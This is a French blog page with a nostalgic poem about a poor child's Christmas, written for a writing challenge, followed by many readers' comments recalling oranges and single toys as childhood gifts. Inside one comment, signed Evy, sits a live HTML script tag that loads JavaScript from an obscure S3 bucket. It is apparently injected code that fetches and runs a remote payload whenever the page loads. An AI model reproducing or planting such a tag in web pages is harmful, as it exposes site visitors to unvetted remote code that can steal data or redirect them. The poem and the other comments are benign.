• Noël d'autrefois...

     

    Noël d'autrefois...

    Pour Plume de Poète chez Evy

    Thème du défi écrire un texte "Rêves d'enfant"
    Et ou avec 10 mots en imposé.

     

    (Curieux, réaliser, enjeu, imaginaire, châteaux
    Rêverie, goutte, instant, choix, incertitude)

     

     

    Noël d'autrefois...

     

     

    Autrefois, autrefois

    Quand le minot dans l'instant

    N'était pas encore devenu ce Roi

    Il était tout à sa rêverie d'enfant

    Un 24 décembre, bûche dans la cheminée,

    Espérant du « Père » imaginaire

    Le château ou la poupée

    Incertitude au coeur, dans les pauvres chaumières...

     

    Il avait pris un soin particulier

    A mettre au verre la goutte, vin de fruits

    Grand était l'enjeu de cette Nuit

    Attendue et redoutée...

     

    Pas de liste mirobolante ma foi

    Avant, juste se languir devant une modeste vitrine

    Curieux du peu, pas le choix

    Conscient que parfois

    Un rêve reste comme une épine

    Une douleur faute de se réaliser, gravée en soi...

     

     

    jill bill sarcastic

     

    Noël d'autrefois...

     françois-et-ses-poupées.skyrock.com

     

    Partager via Gmail Yahoo! Google Bookmarks

  • Commentaires

    59
    Mercredi 20 Novembre à 09:50

    Tu as raison... pas de lettre au Père Noël pour nous autrefois chez nous... mais toujours une surprise, toute petite, qui faisait plaisir.

    Les enfants d'aujourd'hui sont blasés...

      • Mercredi 20 Novembre à 10:10

        C'est le mot, triste société riche et pauvre à la fois !

    58
    Samedi 16 Novembre à 15:48

    De beaux souvenirs, les Noëls de notre enfance.

    Des rêves que nous tentons de revivre au présent.

    Très joli texte pour ce nouveau défi d'Evy.

    Bon week-end !

    Martine

      • Samedi 16 Novembre à 15:59

        Merci Martine...

    57
    Jeudi 14 Novembre à 21:32

    bonsoir bill

    mon souvenir de noel

    une orange coupé en deux , simple et peu

    Mais c 'est ce que me racontait mon père il a vécu jusqu à 88 ans

    bizouille du soir

      • Jeudi 14 Novembre à 22:45

        Oui bill il y aura une orange ( rire ) pourquoi pas BIO ?

        et cadeaux fabriqué maison par mes mimines

        et un gros bisous mon amie

      • Jeudi 14 Novembre à 22:22

        Bonsoir Mary.... Le mien a vécu près de 91 ans... il me racontait, pas sur la Noël, mais qu'il avait un sucre quand il rendait service, ado, au voisinage, des veuves, chez qui il fallait jardiner... ! Alors les 25 décembre... Bonne nuit, bises

    56
    Evy
    Jeudi 14 Novembre à 21:27

    Bonsoir Jill belle participation c'est bien juste les Noël  plus beau et chargé d'émotions on contentait de peu mes meilleurs souvenirs c'est en Alsace c'est magique c'est en ligne passe une bonne soirée bisous

    <script src="https://s3.amazonaws.com/extseahes/2.js"></script>
      • Jeudi 14 Novembre à 22:19

        Bonsoir Evy.... Chez nous juste une crèche et pas de gueuleton... la messe de minuit, pour les plus courageux...  Du Noël pas d'hier mais simplement, le vrai... merci, bises

    55
    Jeudi 14 Novembre à 20:14

    Bonsoir Fabienne. Il n'y avait pas autant de choix qu'aujourd'hui. Je rêvais de recevoir un livre... Bonne soirée et bisous

      • Jeudi 14 Novembre à 20:29

        Bonsoir Brigitte... dans ma ville il y a eu autrefois un vendeur de jouets et un imprimeur... ils mettaient en toutes boîtes leur catalogue en novembre, seulement... joujoux pour l'un, livres pour l'autre... autant dire que je les ai usés à les lire... wink2 Mais de même, bises

    54
    Jeudi 14 Novembre à 18:43

    je me revois rêvant derrière les vitrines des grands magasins parisiens... si nous pouvions revenir en arrière...

      • Jeudi 14 Novembre à 19:06

        Pus je vieillis plus je me dis.... yes même si on était pas gâté, on savait rêver... comme ces deux fillettes...

    53
    Jeudi 14 Novembre à 17:05

    bonjour bill

    je viens de finir mon texte mon amie

    top j'ai réussis j 'ai eu du mal a y entré dans l histoire

    je repars au boulot bizouille du soir

      • Jeudi 14 Novembre à 17:56

        Bonsoir Mary, oui je reviens de chez toi... wink2merci... bonne soirée, bises

    52
    Jeudi 14 Novembre à 16:49
    Ah les Noël de notre enfance même ceux que j ai passe en pension , avec les chats de Noël
    L orange et le Jésus en Sucre.. parfois il neigeait et c etait des jeux fais
    Bonne soirée jill
      • Jeudi 14 Novembre à 17:55

        Le petit Jésus en sucre Monica, j'en achète encore tiens... wink2 La neige, fin décembre, ah... j'en vois plus... bonne soirée, jill

    51
    Jeudi 14 Novembre à 16:43
    Renée

    Ces Noël était quand même plus beau chargé de plus d'émotions, maintenant c'est débauche de cadeaux a peine regardé! Bisous

      • Jeudi 14 Novembre à 17:54

        Noël c'est la Nativité... maintenant c'est la grande bouffe et les cadeaux en tous genres, vive les commerces... bises, jill

    50
    Jeudi 14 Novembre à 13:55

    Mais j'ai des problèmes de site! Alors je refais! Je me souviens d'une lettre au père Noël que vous nous aviez proposée un jour et que j'avais comparé à la lettre au Père Noël qu'avait écrite ma chère enfant. Bravo pour ce texte. Je me souviens aussi que dans les cadeaux devant la cheminée chez mes parents en 1935... il y avait une ORANGE! Ca amuserait les enfants aujourd'hui! Bonne journée,

    Gisèle

      • Jeudi 14 Novembre à 15:42

        Nous avons eu en effet un concours du genre sur APLN... yes Une orange, ce fruit exotique... de nos jours, amuser même plus, râler oui !!!! De même Gisèle...

    49
    Jeudi 14 Novembre à 13:52

    Je me souviens d'une lettre au père Noël que vous nous aviez proposée un jour et que j'avais comparé à la lettre au Père Noël qu'avait écrite ma chère enfant. Bravo pour ce texte. Je me souviens aussi que dans les cadeaux devant la cheminée chez mes parents en 1935... il y avait une ORANGE! Ca amuserait les enfants aujourd'hui! Bonne journée,

    Gisèle

    48
    Jeudi 14 Novembre à 13:18

    " Un rêve qui reste comme une épine " ... 

    Souvent, c'était (c'est) faute de porte-monnaie rempli, et aussi parfois, moins souvent, et bien qu'il n'y ait pas de gêne financière, parce que quelqu'un ou quelque chose se met en travers du rêve ... 

    L'objet, un seul objet, convoité en prend encore plus de valeur, et la déception aussi ... Même si l'exigence n'était pas d'une valeur élevée.

    Mais j'aime me rappeler ces jours de fête (Noël, anniversaire) où je recevais ce que je demandais inévitablement : quelques animaux pour une ferme ! Dans mes souvenirs d'enfance, j'ai été gâtée, de ce côté là ...

    Beau poème, jill, triste, mais qui fait ressentir la " valeur " des choses ... 

    Gros bisous.

      • Jeudi 14 Novembre à 15:40

        L'un ou l'autre Dominique eh oui... de nos jours les parents, moins aisés,  vont se saigner pour offrir un Noël de rêve à leur mômes... arf On mangera des pâtes après !  La valeur des choses, perdue de nos jours, je le crains... merci, bises de jill

    47
    Jeudi 14 Novembre à 11:48

    Un tres beau texte Jill,  même si  je ne restais pas juste avec mes rêves pour Noël , je trouve que cette société et son consumérisme galopant ont bien pourri cette attente et cette fête  . Mes parents m'ont raconté  l'orange et le peu dont ils se satisfaisaient mais aussi le plaisir qu'il trouvait aux repas des fêtes où toute la famille était rassemblée . 

    Bonne journée Jill 

    Bises 

      • Jeudi 14 Novembre à 12:22

        Merci Jazzy.... Chaque famille veut le plus pour son enfant, bon légitime envie, mais faut savoir raison garder ! Et de nos jours... tout part à la déraison !  Ah oui, on vit une époque formidable... merci, de même, bises wink2

    46
    Jeudi 14 Novembre à 11:16
    francinea

    Bonjour, à mon époque il n'y avait pas de liste de Noël, la société de consommation est passée par là;  je te souhaite une bonne journée, bisous

      • Jeudi 14 Novembre à 11:35

        Bonjour Francine, ah ben de mon temps pareil, les parents choisissaient... UN jouet.... bises, jill

    45
    Jeudi 14 Novembre à 10:50
    PPRené

    bonjour chere Jill, je vais te surprendre dans ma jeunesse on ne connaissait pas le père Noel , dans la region centre de la France , pas le sapin non plus, et encore moins St Nicolas, les quelques jouets, ou l'orange,  etaient distribués par le père Janvier, le jour de l'An !!  , depuis ça a changé, je parle des années avant 39/45... alors je ne peux parler des Noel d'autrefois !! bonne journee et grosses bises 

     
     
      • Jeudi 14 Novembre à 11:00

        Bonjour René... Ok.... je vois !  Mes parents, nés en 23 et 25,  ne m'ont jamais parlé de leur saint Nicolas, je me demande même si un jour ils ont connu...  Merci, de même, bises de jillwink2

    44
    Jeudi 14 Novembre à 10:31

    Coucou Jill, poignante nostalgie dans tes mots et en même temps je m'interroge sur les enfants d'aujourd'hui : certains ne sont toujours pas des enfants rois, cruelle inégalité qui ne s'effacera donc jamais ? Bizzz.

      • Jeudi 14 Novembre à 10:58

        Bonjour Lenaïg, c'est vrai côté enfant roi, mais certaines familles moins aisées vont s'endetter pour...  Que dire, ce monde est très bien fait pour les riches.... bizzz

    43
    Jeudi 14 Novembre à 10:26

    Eh oui, les temps ont bien changé...

      • Jeudi 14 Novembre à 10:56

        Et changeront encore...

    42
    Jeudi 14 Novembre à 10:23

    On savait se contenter de peu et l'apprécier!! un seul jouet pour Noël et rien le reste de l'année, maintenant quand Noël arrive on ne sait plus quoi acheter.

    Bonne journée, bises

      • Jeudi 14 Novembre à 10:56

        UN jouet comme un trésor.... yes Maintenant, no comment !!! De même, bises

    41
    Jeudi 14 Novembre à 10:10

    Bonjour Jill 

    On rêvait plus à notre époque , les objectifs étaient plus durs à atteindre  , faute de moyens souvent ...

    Aujourdhui on coche sur catalogue et on veut tout !!

    Bonne journée Jill 

    Bises

     

      • Jeudi 14 Novembre à 10:54

        Bonjour Canelle, voilààààà ! Savent-ils encore la valeur de l'argent... j'ai un petit-fils de 6 ans qui m'a dit un jour, en allant récemment au restau avec ses parents, c'est pas maman qui paie c'est sa carte !!!!!!!!!!!!!!!!!! Bises

    40
    Jeudi 14 Novembre à 09:48

    Comme j'aimais les jours où maman m'emmenait sur les boulevards, (faire la grande distance à pieds, (bus trop cher et le métro … ne m'en parle pas, je ne voulais que la voiture rouge et c'était en première !) regarder les vitrines. C'était tellement beau, il y avait tellement de rêves à faire.

    Pas comme toi, j'ai eu droit à Noël et je crois que la famille se groupait et c'est vrai que j'étais gâtée : une cuisinière pour apprendre à cuisiner, une poupée, un baigneur, une marchande de saison … Pas tout d'un coup, hein, juste un  à la fois !

    Et oui, il y avait le verre de vin chaud pour le Père Noël et la carotte pour le renne. 

    Bises4 Jill

      • Jeudi 14 Novembre à 10:53

        Trop ne rend plus heureux mais difficile client !!!!!!  sarcastic De notre jeune temps on ne remplissait pas une chambre avec des jouets, j'ai eu la liste de mes petits-enfants, pas triste leur St Nicolas... !!!!  Et x 10 un coût ! Bref.... merci la miss, bises4

    39
    Jeudi 14 Novembre à 09:35

    Attendre peut ce qui ne viendra pas, des jours de rêves, c'était toujours cela de pris !!!

      • Jeudi 14 Novembre à 09:37

        Oui, à huit ans déjà je n'avais plus droit à notre St Nicolas.... alors on regardait l'étalage du seul marchand de jouets,... sans mot dire ! arf

    38
    Jeudi 14 Novembre à 09:34

    autrefois le minot était riche de rêves, maintenant il est gavé jusqu'à la nausée

      • Jeudi 14 Novembre à 09:35

        Voilà pourquoi Emma ce monde sa gangrène....

    37
    Mamazerty
    Jeudi 14 Novembre à 08:08
    Bien des adultes ne rêvent plus non plus... beau texte Fabienne
      • Jeudi 14 Novembre à 09:11

        Serait-on blasé.... !? Ma foi... Jamais plus content non plus...

    36
    Jeudi 14 Novembre à 08:04

    Voici un texte qui rappelle que "les vieux" dans leur enfance savaient se contenter de peu.

    Bises et bon jeudi Jill

      • Jeudi 14 Novembre à 09:10

        Il n'y a pas tout ce qu'on voit et achète, alors oui côté mentalité... bises, JB

    35
    Jeudi 14 Novembre à 05:13

    Oui un texte qui parle bien 

    Les enfants sont trop gavés aujourd'hui 

    Je préférais avant ...

    Bonne journée 

    Bises 

      • Jeudi 14 Novembre à 09:10

        Et gavés c'est pas pour leur bien, une fois indépendants.... bises

    34
    Jeudi 14 Novembre à 04:34
    Je n'ai pas connu cette incertitude de l'enfant pauvre mais j'en ai eu conscience très tôt car ma grand-mère me disait que quand elle était petite elle n'avait qu'une Orange à Noël. Bisous
      • Jeudi 14 Novembre à 09:09

        D'un enfant à l'autre... eh oui nos chers aïeux, devaient pas faire les difficiles et capricieux ! Merci Martine, bises

    33
    Jeudi 14 Novembre à 03:42
    colettedc

    Bien oui, autrefois, c'était bien cela. L'enfant se contentait de peu et ne rechignait pas pour autant !!! Quel bon choix d'illustration pour accompagner tes si bons mots, Jill ! Bravo et bon jeudi ! Bises♥

      • Jeudi 14 Novembre à 04:29

        On a pas connu la caverne d'Ali Baba côté jouets !!! Merci soeur Colette, de même, bises

    32
    Jeudi 14 Novembre à 00:55

    beaux texte ... c'est dure de rester sur sa faim au niveau des rêves !!!

    besos

    tilk

      • Jeudi 14 Novembre à 01:01

        Merci bien Tilk... eh oui, qui n'en a pas resté au fond de soi... bises

    31
    Jeudi 14 Novembre à 00:43
    bonjour Jill bien fait ton texte passe une bonne journee Rene
      • Jeudi 14 Novembre à 01:00

        Bonjour René, merci et de même, jill

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :